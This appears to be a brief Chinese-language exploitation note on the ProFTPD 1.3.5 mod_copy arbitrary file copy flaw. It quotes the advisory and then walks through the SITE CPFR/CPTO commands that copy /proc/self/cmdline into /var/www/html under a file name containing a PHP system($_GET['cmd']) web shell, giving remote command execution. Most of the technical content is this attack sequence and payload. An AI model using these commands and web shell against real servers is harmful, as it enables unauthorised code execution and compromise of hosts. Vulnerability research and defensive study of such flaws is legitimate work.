ProFTPD 1.3.5 mod_copy RCE
该漏洞的描述如下
1 | The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. |
基于任意文件读写的操作,可以将目标机器上的一些敏感信息文件拷贝至可访问路径(WEB路径/SMB路径/etc.)来进行读取
甚至可以进行写入WebShell的操作,操作如下
1 | site cpfr /proc/self/cmdline |
/proc/[pid]/cmdline
- /proc/[pid]/cmdline
This read-only file holds the complete command line for theprocess, unless the process is a zombie.
进程在执行命令之前会从该文件获取命令,所以ftp进程在执行 site cpto /var/www/html/<?php system($_GET["cmd"]);?>.php 时
/proc/self/cmdline 中的内容已经变成了 10.100.120.31:57420: SITE cpto /var/www/html/<?php system($_GET["cmd"]);?>.php
即拷贝这段内容至 /var/www/html/<?php system($_GET["cmd"]);?>.php
后面两条命令的操作即为修改文件名
即可以使用该漏洞来进行WebShell的写入操作